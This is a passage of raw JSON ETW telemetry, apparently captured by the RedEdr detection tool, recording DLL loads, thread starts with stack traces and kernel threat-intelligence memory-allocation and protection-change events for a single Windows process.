","id":49,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722541706093,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973843604,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83D40000","ImageBase":"00007FFC83D40000","ImageCheckSum":"681663","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcrt.dll","ImageSize":"000000000009E000","ProcessID":"1208","TimeDateStamp":"2616593924","event":"ImageLoadInfo 
","id":50,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722541706093,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973844199,"trace_id":41,"type":"etw"},{"ProcessID":"1208","StackBase":"FFFF8185AAC77000","StackLimit":"FFFF8185AAC71000","StartAddr":"00007FFC8513D110","SubProcessTag":"0","TebBase":"0000009FD88DA000","ThreadID":"11092","UserStackBase":"0000009FD8C00000","UserStackLimit":"0000009FD8BFF000","Win32StartAddr":"00007FFC8513D110","event":"ThreadStartStart ","id":51,"opcode_id":1,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801540391,18446735283801538352,18446735283801537158,18446735283799009541,18446735283798947552,18446735283801492570,18446735283797779076,18446735283796924337,18446735283796923547,18446735283799009541,140722541495044,140722540915673,140722540915302,140722540901535,140722540936098,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722541706093,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973844777,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC84650000","ImageBase":"00007FFC84650000","ImageCheckSum":"673563","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\sechost.dll","ImageSize":"000000000009F000","ProcessID":"1208","TimeDateStamp":"1942365337","event":"ImageLoadInfo 
","id":52,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722541706093,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973845122,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83410000","ImageBase":"00007FFC83410000","ImageCheckSum":"1244603","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\rpcrt4.dll","ImageSize":"0000000000123000","ProcessID":"1208","TimeDateStamp":"2016036219","event":"ImageLoadInfo ","id":53,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722541706093,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973845622,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82C20000","ImageBase":"00007FFC82C20000","ImageCheckSum":"199345","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\bcrypt.dll","ImageSize":"0000000000027000","ProcessID":"1208","TimeDateStamp":"2535700803","event":"ImageLoadInfo 
","id":54,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722541706093,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973846304,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC62B00000","ImageBase":"00007FFC62B00000","ImageCheckSum":"929031","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcp140d.dll","ImageSize":"00000000000E2000","ProcessID":"1208","TimeDateStamp":"4270244042","event":"ImageLoadInfo ","id":55,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973850339,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC848D0000","ImageBase":"00007FFC848D0000","ImageCheckSum":"1221752","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ole32.dll","ImageSize":"000000000012B000","ProcessID":"1208","TimeDateStamp":"610785574","event":"ImageLoadInfo 
","id":56,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973850943,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82C50000","ImageBase":"00007FFC82C50000","ImageCheckSum":"1076532","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ucrtbase.dll","ImageSize":"0000000000100000","ProcessID":"1208","TimeDateStamp":"2177850761","event":"ImageLoadInfo ","id":57,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973851508,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC84D50000","ImageBase":"00007FFC84D50000","ImageCheckSum":"3511252","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\combase.dll","ImageSize":"0000000000353000","ProcessID":"1208","TimeDateStamp":"3888075817","event":"ImageLoadInfo 
","id":58,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973852214,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC833E0000","ImageBase":"00007FFC833E0000","ImageCheckSum":"218727","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\gdi32.dll","ImageSize":"000000000002B000","ProcessID":"1208","TimeDateStamp":"3634633287","event":"ImageLoadInfo ","id":59,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973852906,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82FF0000","ImageBase":"00007FFC82FF0000","ImageCheckSum":"137991","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\win32u.dll","ImageSize":"0000000000022000","ProcessID":"1208","TimeDateStamp":"3336608826","event":"ImageLoadInfo 
","id":60,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973853419,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82B00000","ImageBase":"00007FFC82B00000","ImageCheckSum":"1180473","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\gdi32full.dll","ImageSize":"0000000000117000","ProcessID":"1208","TimeDateStamp":"576863693","event":"ImageLoadInfo ","id":61,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973853787,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83070000","ImageBase":"00007FFC83070000","ImageCheckSum":"659111","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcp_win.dll","ImageSize":"000000000009D000","ProcessID":"1208","TimeDateStamp":"958749903","event":"ImageLoadInfo 
","id":62,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973854262,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC84A00000","ImageBase":"00007FFC84A00000","ImageCheckSum":"1745311","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\user32.dll","ImageSize":"000000000019D000","ProcessID":"1208","TimeDateStamp":"4291603748","event":"ImageLoadInfo 
","id":63,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722540939432,140722540935977,140722540923924,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973854932,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC77340000","ImageBase":"00007FFC77340000","ImageCheckSum":"215677","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\vcruntime140d.dll","ImageSize":"000000000002B000","ProcessID":"1208","TimeDateStamp":"3390545094","event":"ImageLoadInfo ","id":64,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973856273,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC7DD50000","ImageBase":"00007FFC7DD50000","ImageCheckSum":"124685","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\vcruntime140_1d.dll","ImageSize":"000000000000F000","ProcessID":"1208","TimeDateStamp":"743278547","event":"ImageLoadInfo 
","id":65,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973857377,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC628D0000","ImageBase":"00007FFC628D0000","ImageCheckSum":"2249853","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ucrtbased.dll","ImageSize":"0000000000222000","ProcessID":"1208","TimeDateStamp":"3642813796","event":"ImageLoadInfo ","id":66,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722541236803,140722541235360,140722541232480,140722541232200,140722541706103,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973858416,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83DE0000","ImageBase":"00007FFC83DE0000","ImageCheckSum":"244437","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\imm32.dll","ImageSize":"000000000002F000","ProcessID":"1208","TimeDateStamp":"3510600902","event":"ImageLoadInfo 
","id":67,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722541282029,140722540968753,140722540934116,140722540931828,140722498119186,140722533672481,140722533664800,140722540943901,140722541286135,140722541285514,140722541285648,140722541285648,140722541285648,140722541706418,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973877940,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC630A0000","ImageBase":"00007FFC630A0000","ImageCheckSum":"0","ImageName":"\\Device\\HarddiskVolume2\\RedEdr\\RedEdrDll.dll","ImageSize":"0000000000082000","ProcessID":"1208","TimeDateStamp":"1734697896","event":"ImageLoadInfo ","id":68,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722541236803,140722541236080,140722541232655,140722540968787,140722540934116,140722540931828,140722498119186,140722498150113,140722541498974,140722541497636,140722541322413,140722541321331,140722541321246],"thread_id":6916,"time":133791868973891869,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC73E50000","ImageBase":"00007FFC73E50000","ImageCheckSum":"1883635","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\dbghelp.dll","ImageSize":"00000000001E4000","ProcessID":"1208","TimeDateStamp":"2592498981","event":"ImageLoadInfo 
","id":69,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722541236803,140722541235360,140722541232480,140722541232200,140722540968797,140722540934116,140722540931828,140722498119186,140722498150113,140722541498974,140722541497636,140722541322413,140722541321331,140722541321246],"thread_id":6916,"time":133791868973894702,"trace_id":41,"type":"etw"},{"ProcessID":"1208","StackBase":"FFFF8185AAC8C000","StackLimit":"FFFF8185AAC86000","StartAddr":"00007FFC8513D110","SubProcessTag":"0","TebBase":"0000009FD88DC000","ThreadID":"3196","UserStackBase":"0000009FD8D00000","UserStackLimit":"0000009FD8CFF000","Win32StartAddr":"00007FFC8513D110","event":"ThreadStartStart ","id":70,"opcode_id":1,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801540391,18446735283801538352,18446735283801537158,18446735283799009541,18446735283798947552,18446735283801492570,18446735283797779076,18446735283796924337,18446735283796923547,18446735283799009541,140722541495044,140722540915673,140722540970036,140722541246040,140722541156250,140722508034932,140722541153425],"thread_id":11092,"time":133791868973904770,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82F60000","ImageBase":"00007FFC82F60000","ImageCheckSum":"531569","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\bcryptprimitives.dll","ImageSize":"0000000000082000","ProcessID":"1208","TimeDateStamp":"3309379821","event":"ImageLoadInfo 
","id":71,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140721970357133,140722540924226,140722540923562,140722540921977,140722541282029,140722540968753,140722540932416,140722540930798,140722541041959,140722540905542,140722510982114,140722511029553,140722510934949,140722252973064,140722252970041,140722252944910,140721970336136,140721970334552,140721970362881,140722498356982,140700732029427,140700732031462,140700732110521,140700732110174,140700732109854,140700732110670,140722508034932,140722541153425],"thread_id":6916,"time":133791868979064970,"trace_id":41,"type":"etw"},{"ProcessID":"1208","StackBase":"FFFF8185AC7B9000","StackLimit":"FFFF8185AC7B3000","StartAddr":"0000023F29030000","SubProcessTag":"0","TebBase":"0000009FD88DE000","ThreadID":"5680","UserStackBase":"0000009FD8E00000","UserStackLimit":"0000009FD8DFF000","Win32StartAddr":"0000023F29030000","event":"ThreadStartStart ","id":72,"opcode_id":1,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801540391,18446735283801538352,18446735283801537158,18446735283799009541,140722541489444,140721970350754,140722498157487,140722508052765,140700732029491,140700732031462,140700732110521,140700732110174,140700732109854,140700732110670,140722508034932,140722541153425],"thread_id":6916,"time":133791868979501089,"trace_id":41,"type":"etw"},{"AllocationType":"12288","BaseAddress":"0x0000025BA365C900","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 
17.48.17","CallingThreadId":"6916","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365CB30","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"ALLOCVM_LOCAL","id":73,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909306,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C540","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"32","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C8B0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown 
type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":74,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909600,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4A0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"32","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365CB30","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":75,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909618,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C950","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"32","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown 
type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C5E0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":76,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909633,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"32","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C720","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":77,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909646,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C590","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown 
type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C630","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":78,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909659,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CA40","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C720","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown 
type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":79,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909673,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C7C0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C720","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":80,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909685,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C6D0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown 
